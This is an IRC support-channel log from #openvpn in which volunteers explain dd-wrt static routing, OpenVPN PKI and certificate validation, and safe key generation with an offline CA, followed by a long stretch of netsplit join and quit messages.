14:16 < WDKevin> hmmm
14:17 < WDKevin> i dont even want to guess anymore for fear of just sounding dumber and dumber :(
14:17 -!- joshie_ is now known as joshie
14:17 <@dazo> WDKevin: if you look at your VPN clients routing table ... you probably find a route saying destination: 10.8.0.0 subnet: 255.255.255.0 gateway: 10.8.0.1
14:17 <@dazo> sorry!
14:17 <@dazo> wrong!
14:17 <@dazo> WDKevin: if you look at your VPN clients routing table ... you probably find a route saying destination: 192.168.1.0 subnet: 255.255.255.0 gateway: 10.8.0.1
14:18 < WDKevin> so thats my destination?
14:18 < WDKevin> 192.168.1.0?
14:18 <@dazo> that means that your VPN client knows that when it tries to access a server inside your 192.168.1.{0-255} subnet ... it will send that traffic via the gateway: 10.8.0.1
14:18 < WDKevin> no
14:18 <@dazo> yes, 192.168.1.0 on your client is the destination
14:18 <@dazo> field
14:18 < WDKevin> ok
14:19 < WDKevin> it kinda made sense once you explained it
14:19 < WDKevin> ok
14:19 < WDKevin> so the rule says
14:19 < WDKevin> destination 192.168.1.10 subnet 255.255.255.0 gateway 192.168.1.101
14:19 < WDKevin> sorry
14:19 <@dazo> almost
14:19 < WDKevin> destination is 192.168.1.0
14:19 < WDKevin> typo
14:20 <@dazo> gateway is also wrong
14:20 < WDKevin> i thought gateway was my eth0 ip on the openvpn box?
14:20 <@dazo> because your VPN client doesn't know anything about the 192.168.1.0 subnet
14:20 <@dazo> your client needs to send that traffic via your VPN server, which from your VPN clients point of view is 10.8.0.1
14:20 < WDKevin> so the gateway is 192.168.1.101
14:20 < WDKevin> correct!
14:20 <@dazo> WDKevin: on the dd-wrt box, that is correct
14:21 <@dazo> that's a different view
14:21 < WDKevin> thats where im setting this
14:21 < WDKevin> im still on dd-wrt advanced routing screen trying to add this rule
14:21 <@dazo> ahh!
14:21 <@dazo> sorry, then I confused you!
14:21 < WDKevin> haha yea
14:21 < WDKevin> i wanted to understand that rule before i added it
14:21 <@dazo> on the dd-wrt ... you need destination 10.8.0.0 subnet 255.255.255.0 gateway 192.168.1.101
14:21 < WDKevin> gah!
14:21 < WDKevin> ok
14:22 <@dazo> that tells dd-wrt to route all packets going to your VPN via your VPN server, which has the local IP address 192.168.1.101
14:22 < WDKevin> do i need to do anything with the metric field?
14:22 <@dazo> nope
14:22 < WDKevin> that rule makes so much more sense now
14:22 <@dazo> :)
14:23 < WDKevin> ok
14:23 < WDKevin> now let me disco/reconnect to the vpn and try to ping that box
14:23 <@dazo> you don't need to reconnect
14:23 <@dazo> it should just work now :)
14:23 < WDKevin> holy jesus
14:23 < WDKevin> it does
14:23 <@dazo> ;-)
14:23 < WDKevin> im saving this entire convo
14:23 < WDKevin> i need to reread it a few times and really understand whats going on
14:24 < WDKevin> i cant thank you enough for making me go through the process this way. its the only way i can learn it and i truly appreciate your patience dazo
14:24 <@dazo> WDKevin: okay .... on your VPN client ... pastebin your routing table .... and I'll ask you a few questions related to that table
14:24 <@dazo> WDKevin: it's easy to help people who want to learn things! :)
14:25 < WDKevin> my vpn client is my work machine
14:25 < WDKevin> im at work right now
14:25 <@dazo> yeah, that's very fine
14:25 <@dazo> those questions will hopefully help you to understand the routing a bit more
14:25 < WDKevin> ok
14:25 < WDKevin> how can i get my routing table from a win7 box?
14:28 <@dazo> route print
14:28 <@dazo> from a shell
14:28 <@dazo> (cmd.exe)
14:31 < WDKevin> i can see my vpn ip in there too
14:31 <@dazo> yeah ....
14:36 -!- Devastator- [~devas@186.214.111.241] has joined #openvpn
14:38 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds]
14:39 < EugeneKay> Sweeeet. Just got my openvpn shirt
14:40 <@plaisthos> EugeneKay: :)
14:40 < EugeneKay> Smells funny though
15:09 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has quit [Ping timeout: 255 seconds]
15:13 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has joined #openvpn
15:14 -!- dazo is now known as dazo_afk
15:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds]
15:42 -!- nze [~user@unaffiliated/nze] has quit [Ping timeout: 255 seconds]
15:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
15:55 -!- vmachine1 [~PC@78-105-138-183.zone3.bethere.co.uk] has joined #openvpn
15:55 -!- vmachine1 [~PC@78-105-138-183.zone3.bethere.co.uk] has left #openvpn []
16:02 -!- nickanderson is now known as nickanderson_afk
16:04 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
16:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
16:28 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
16:37 < kisom> EugeneKay: Smells like VPN ;)
16:39 < EugeneKay> I was thinking moth balls
16:41 -!- gry [~gry@freenode/staff/gry] has joined #openvpn
16:42 -!- gry [~gry@freenode/staff/gry] has left #openvpn []
16:44 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
16:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds]
17:09 -!- scampbell [~scampbell@mail.scampbell.net] has quit [Remote host closed the connection]
17:27 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
17:27 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
17:27 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:27 -!- mode/#openvpn [+o krzee] by ChanServ
18:02 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 246 seconds]
18:03 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn
18:07 < lickalott> dazo_afk where did you get this info from "it exists a database over all ssh/https keys used in all dd-wrt distributions"
18:08 < lickalott> i was told " the ssh key generation is not set with constants. /dev/urandom is used."
18:08 < lickalott> just want to verify sources
18:09 < pekster> Don't generate ssh keys on embedded hardware like routers. Your entropy will suck leading to very weak key generation
18:12 < pekster> Further reading: http://eprint.iacr.org/2006/086.pdf or a talk from this year's 29C3 available here, at talk ID 5275: http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/
18:12 <@vpnHelper> Title: Index of /CCC/29C3/mp4-h264-HQ (at mirror.fem-net.de)
18:12 < pekster> And that applies to any crypto keys (openvpn X509, ssh keypairs, keys for your webserver, etc, etc)
18:18 < lickalott> currently I have openvpn-as running on an ubuntu server. I haven't done the easy-rsa stuff yet to create my own CA (i seem to be missing things that the tut's call out) but do you think it's a better idea to leave it on there? I can access my network fine, i just figured having it on a router would make more sense.
18:20 < pekster> Nothing wrong with running openvpn on embedded hardware (openwrt, dd-wrt, or similar) but don't actually generate your private keys on that system
18:21 < pekster> Generate them on a system with proper entropy sources, preferably after it's been running for a little bit, and then transfer the keys over
18:22 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn
18:22 < pekster> Optionally, you can run openvpn on the ubuntu box too and just port-forward through any NAT you have on the router
18:22 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has left #openvpn []
18:22 < pekster> (I suspect openvpn and openvpn-as can coexist, but I've never touched the as product, so don't take my word on it)
18:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:39 -!- mattbillenstein [~mattbille@173.247.206.178] has joined #openvpn
18:50 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 246 seconds]
18:54 -!- AsadH is now known as zz_AsadH
18:55 < mattbillenstein> hi all
18:56 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn
18:56 < mattbillenstein> I recently had to switch out my openvpn server
18:56 < mattbillenstein> and I didn't transfer some of the client keys
18:56 < mattbillenstein> but those clients are still able to connect
18:56 < mattbillenstein> which is sorta alarming
18:56 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 248 seconds]
18:57 < mattbillenstein> how would that be possible?
18:57 < pekster> Because that's how PKI works
18:57 < pekster> The server uses the CA root certificate to verify that the cert presented over the wire by a connecting client is valid
18:58 < pekster> !pki
18:58 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Here's a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that each other were signed by the right ca.key. Optionally, the client also checks that the server cert was
18:58 <@vpnHelper> signed specially as a server (see !servercert)
19:03 < mattbillenstein> I see, didn't really understand that's how it worked
19:04 < pekster> If you're missing critical parts of your PKI, that may prevent you from signing certs for new clients, or (easily) revoking existing ones
19:06 < pekster> Specifically, you'll be completely hosed if you didn't back up your CA private key and have no other backups (that's the private part of the root keypair that signs everything else)
19:06 < mattbillenstein> yup, I keep a backup of that on a secondary server
19:06 < mattbillenstein> but when the primary went down (disk failure) - I hadn't synced over the client keys
19:06 < pekster> Outside of that, most of the PKI is accounting stuff. The index.txt file is a "database" of sorts, and the public keys of everything that's been signed can be referred to later to revoke each client
19:06 < mattbillenstein> so I was surprised when they could connect anyway
19:07 < pekster> Do you still have the client certs at least? It's somewhat non-trivial to revoke a client certificate without being able to refer to the actual issued cert
19:08 < mattbillenstein> I was able to recover them from the disk actually, so I do have them
19:08 < mattbillenstein> I need a more automated backup here to prevent this sorta thing in the future
19:08 < pekster> Yea, I was just going to suggest you treat your PKI as a critical part of your backup infrastructure
19:09 < pekster> You can re-do your PKI, but then every client and your server(s) need new keypairs and a new ca.crt
19:09 < pekster> I've done that in the past for various reasons, and it's Not Fun (TM)
19:10 < mattbillenstein> cool, thanks for the advice
19:26 -!- Devastator- [~devas@186.214.111.241] has quit [Changing host]
19:26 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
19:26 -!- Devastator- is now known as Devastator
19:28 -!- raidz is now known as raidz_away
19:33 -!- mattbillenstein [~mattbille@173.247.206.178] has left #openvpn []
19:37 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Read error: Operation timed out]
19:37 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn
19:51 < Devastator> pekster does this look safer than my last one? http://codepad.org/kwzRR2s5
19:51 <@vpnHelper> Title: Plain Text code - 23 lines - codepad (at codepad.org)
19:52 < Devastator> I hope this is the last one heheh
19:52 < pekster> Sort of. I don't let my keys touch USB devices that go into live systems
19:54 < pekster> Let's say I buy a new laptop and want to generate a keypair for my existing home VPN. I'd generate a keypair directly on the laptop with its own completely separate process (not at all related to my VPN PKI on my CA system)
19:54 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn
19:54 < mattwj2002> hi all
19:54 < mattwj2002> sol?
19:54 < mattwj2002> :P
19:55 < pekster> I take one of my everyday USB sticks, put the CSR from that laptop on it, and copy it to the offline CA system. It signs it, then I put the cert back on the non-critical USB stick for transport back
19:55 < mattwj2002> I am a native English speaker
19:55 < pekster> See how the private keys are never (not even for an instant) on a machine besides the one that generated it?
19:56 < mattwj2002> so openvpn?
19:56 < mattwj2002> how good is it?
19:57 < pekster> (except many of my VPN CAs are run from an online, semi-secure, but networked, host. Same principle really, but I use ssh/scp as a transport, not USB sticks there)
19:57 < Devastator> pekster isn't this what I did? I guess your offline CA system isn't a pendrive that you use on a live distro..
19:57 < pekster> For 2 of my more "critical" PKI environments it is
19:57 < pekster> And one of my former client's was
19:58 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has left #openvpn []
19:58 < pekster> Step #4 in your list exposes the entire PKI to the server. That's unnecessary
19:59 < pekster> Let's say your server is compromised (for whatever reason.) Now that rogue process/user/whatever had access to copy the entire contents of the drive somewhere and begin brute-forcing it. Likely? Maybe not, but it doesn't make sense to use an offline CA if you don't actually keep it offline
19:59 < pekster> If that's not a security risk for you (it's not for many use-cases) then don't bother keeping it offline. Or just do it all on the server anyway and run it out of the USB stick to begin with
20:00 < pekster> (ie: limit the exposure for a possible attack to times when the removable media is in the system physically)
20:00 < Devastator> I guess it's not clear from the pastebin, but I separated computer #1 (server) and computer #2 (offline, live distro, used to sign certs)
20:00 < pekster> Oh, sorry, step #6
20:01 < pekster> The PKI, including the private key, is now connected to your online server
20:01 < pekster> It's no longer completely offline at that point
20:01 < Devastator> indeed
20:01 < pekster> There's no reason you need to do that
20:02 < Devastator> well, easy to fix at least, I copy ca.crt from the offline to a non-critical usb stick, then paste to the server, then build-key-server, build-dh
20:02 < Devastator> and keep ca.key totally offline
20:03 < pekster> Better. Best is to generate key pairs on the server/client itself
20:03 < Devastator> I mean, build-key-server and build-dh will be typed on the server itself
20:03 < pekster> build-req is required
20:04 < Devastator> right
20:04 < pekster> build-key-server is for when you do the key generation *and* signing on the same host (not possible when your PKI is offline)
20:04 < pekster> build-key-server basically does build-req and sign-req --server "at once"
20:04 < pekster> (versus separate operations on different systems)
20:05 < Devastator> pekster you said something about server key pairs aren't passphrased or something, can't I use build-req-pass for server as well?
20:06 < pekster> Only if you want to supply the passphrase to your key every time you launch the server process
20:06 < pekster> If you start openvpn on boot, that doesn't work
20:06 < Devastator> indeed
20:06 < pekster> (it also likely won't work unless you use the management interface if you plan to call it out of init anyway)
20:06 < Devastator> I guess it's ok to build-req it then
20:07 < pekster> So no, for servers (openvpn, apache's httpd, etc) traditionally the key is unencrypted on disk. Sometimes it's stored on an encrypted disk volume, but then someone still needs to decrypt it after a reboot
20:07 < pekster> Some people encrypt the key and store the decryption in a text file, but that's sort of silly IMO
20:09 < pekster> Also, no need to "secure" the transport medium. You're free to delete the csr and crt files when you're done, but they aren't private. You could paste them all in a pastebin and it wouldn't hurt your cryptographic security
20:10 < pekster> (and your certs are sent in plaintext across the wire every time you connect to the VPN. Any attacker on the wire could recover the entire cert file this way)
20:15 <@krzee> wow that conversation is still going on?
20:15 <@krzee> <-- amazed!
20:16 <@krzee> its like watching a car burn rubber
20:17 <@krzee> then again, im hella blazed, bbl :D
20:19 < Devastator> krzee what can I do if I'm a slow learner?
20:19 < Devastator> :(
20:19 <@krzee> you're good, im just mean dont worry about me ;]
20:20 < Devastator> I agree with you, I wish I was more.. careless
20:25 * Devastator is afraid to paste his last pastebin..
don't wanna push some buttons 20:33 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 240 seconds] 20:50 -!- mattwj2002 [~Matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn 20:50 -!- mattwj2002 [~Matt@wikisource/pdpc.active.mattwj2002] has left #openvpn [] 21:14 -!- Netsplit *.net <-> *.split quits: js_, hive-mind, Devastator, folivora, defswork, piele, jave, fatpony, nameless`, dvl, (+155 more, use /NETSPLIT to show all of them) 21:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 22:27 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 22:27 -!- Aketzu [akolehma@kelvin.aketzu.net] has joined #openvpn 22:27 -!- andi [~andi@unaffiliated/fr00d] has joined #openvpn 22:27 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn 22:27 -!- NChief_ [tomme@unaffiliated/nchief] has joined #openvpn 22:27 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 22:27 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 22:27 -!- pekster [~rewt@cl-466.chi-03.us.sixxs.net] has joined #openvpn 22:27 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn 22:27 -!- mete [~mete@mete.shell.la] has joined #openvpn 22:27 -!- midgaze [~mreid@155.229.21.75] has joined #openvpn 22:27 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 22:27 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 22:27 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 22:27 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 22:27 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 22:27 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 22:27 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 22:27 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 22:27 -!- william_ [~x@lotus.redl8.com] has joined #openvpn 22:27 -!- 
rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 22:27 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 22:27 -!- peper [~peper@node.piotrj.org] has joined #openvpn 22:27 -!- ngharo [~ngharo@shepard.sypherz.com] has joined #openvpn 22:27 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 22:27 -!- con3x [~pkinnaird@kobol.geeksoc.org] has joined #openvpn 22:27 -!- paccer [uid4847@gateway/web/irccloud.com/x-iggwqzmrrmnhkcai] has joined #openvpn 22:27 -!- kirin` [telex@gateway/shell/anapnea.net/x-uvulotxunalwtwsa] has joined #openvpn 22:27 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 22:27 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn 22:27 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+ooov plaisthos mattock raidz_away hazardous] by calvino.freenode.net 22:27 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 22:27 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 22:27 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 22:27 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 22:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 22:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 22:27 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has joined #openvpn 22:27 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 22:27 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 22:27 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 22:27 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 22:27 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 22:27 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 22:27 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 22:27 -!- troyt 
[~troyt@2001:1938:240:3000::3] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+o vpnHelper] by calvino.freenode.net 22:27 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 22:27 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 22:27 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 22:27 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has joined #openvpn 22:27 -!- gardar [~gardar@gardar.net] has joined #openvpn 22:27 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 22:27 -!- walp [~nobody@unaffiliated/walp] has joined #openvpn 22:27 -!- master_of_master [~master_of@p57B532CC.dip.t-dialin.net] has joined #openvpn 22:27 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:27 -!- folivora [~out@46.19.34.64] has joined #openvpn 22:27 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 22:27 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 22:27 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 22:27 -!- erry [erry@freenode/staff/erry] has joined #openvpn 22:27 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 22:27 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 22:27 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 22:27 -!- hid3 [~arnoldas@78.157.71.116] has joined #openvpn 22:27 -!- uuuppz_ [uuuppz@78.129.207.46] has joined #openvpn 22:27 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 22:27 -!- Rienzilla [rien@sinas.rename-it.nl] has joined #openvpn 22:27 -!- ChauffeR [squirrel@has.a.fluffy.redtail.it] has joined #openvpn 22:27 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 22:27 -!- inimino [~inimino@oftn/board/inimino] has joined #openvpn 22:27 -!- thumbs [1000@unaffiliated/thumbs] has joined #openvpn 22:27 -!- kjs [kjs@fedora/kjs] has joined #openvpn 22:27 -!- js_ [~js@li503-152.members.linode.com] has joined #openvpn 22:27 -!- oskie 
[~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 22:27 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 22:27 -!- nullsign [~nullsign@daedalus.genom.com] has joined #openvpn 22:27 -!- DaCheat_ [JMark@external.JmarkIT.com] has joined #openvpn 22:27 -!- dvl [~dan@pdpc/supporter/active/dvl] has joined #openvpn 22:27 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 22:27 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 22:27 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-yssobzmevvtknuoq] has joined #openvpn 22:27 -!- parmegv [U2FsdGVkX1@ma.sdf.org] has joined #openvpn 22:27 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 22:27 -!- lbft [~lbft@199.195.249.177] has joined #openvpn 22:27 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 22:27 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 22:27 -!- colo-work [~jt@78.142.138.4] has joined #openvpn 22:27 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 22:27 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 22:27 -!- jY [~jy@photoblog.com] has joined #openvpn 22:27 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has joined #openvpn 22:27 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+o novaflash] by calvino.freenode.net 22:27 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 22:27 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 22:27 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 22:27 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 22:27 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 22:27 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 22:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:27 -!- cmelbye [~charlie@yourwiki/staff/charlie] has joined #openvpn 
22:27 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 22:27 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 22:27 -!- corretico [~luis@190.211.93.38] has joined #openvpn 22:27 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 22:27 -!- nameless` [~nameless@u1c.eu] has joined #openvpn 22:27 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 22:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 22:27 -!- rkantos [robin@4e.fi] has joined #openvpn 22:27 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 22:27 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 22:27 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 22:27 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:27 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 22:27 -!- TheLaw [~law@irc.l4w.info] has joined #openvpn 22:27 -!- defswork [~andy@141.0.50.105] has joined #openvpn 22:27 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has joined #openvpn 22:27 -!- benedikt [~benedikt@unaffiliated/benedikt] has joined #openvpn 22:27 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 22:27 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 22:27 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 22:27 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has joined #openvpn 22:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 22:27 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 22:27 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn 22:27 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn 22:27 -!- Erawan_RN [~Erawan@unaffiliated/erawanarifnugroh] has joined #openvpn 22:27 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 22:27 -!- 
CEnnis91 [uid3543@gateway/web/irccloud.com/x-jwtrifiamymywmib] has joined #openvpn 22:27 -!- Fiouz_ [~Fiouz@2a01:e0b:1:68:240:63ff:fee6:924b] has joined #openvpn 22:27 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 22:27 -!- Martin` [martin@2001:16f8:2:10::215] has joined #openvpn 22:27 -!- Champi [Champi@rootshell.fr] has joined #openvpn 22:27 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 22:27 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 22:27 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 22:27 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 22:27 -!- nickanderson_afk [~cmdln@ginger.pilgrimpage.com] has joined #openvpn 22:27 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+o dazo_afk] by calvino.freenode.net 22:27 -!- Pei [pei@2600:3c00::f03c:91ff:feae:5e2d] has joined #openvpn 22:27 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 22:27 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:27 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 22:27 -!- echinos_ [~echinos@67.196.136.211] has joined #openvpn 22:27 -!- zamba [marius@flage.org] has joined #openvpn 22:27 -!- Varazir [~mircwars@c-94-255-128-179.cust.bredband2.com] has joined #openvpn 22:27 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 22:27 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 22:27 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 22:27 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has joined #openvpn 22:27 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 22:27 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 22:27 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 22:28 -!- sauce 
[sauce@ool-ad02ad20.dyn.optonline.net] has joined #openvpn 22:28 -!- joshie [~josh@75-150-76-129-NewEngland.hfc.comcastbusiness.net] has joined #openvpn 22:28 -!- BtbN [~btbn@btbn.de] has joined #openvpn 22:28 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:28 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 22:28 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 22:28 -!- [fred] [fred@konfuzi.us] has joined #openvpn 22:28 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 22:28 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 22:28 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 22:28 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 22:28 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 22:28 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 22:28 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood] 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 22:28 -!- pekster [~rewt@cl-466.chi-03.us.sixxs.net] has quit [Changing host] 22:28 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 22:28 -!- peper [~peper@node.piotrj.org] has quit [Max SendQ exceeded] 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood] 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 22:28 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded] 22:28 -!- ppr [~peper@gentoo/developer/peper] has joined #openvpn 22:28 -!- sauce 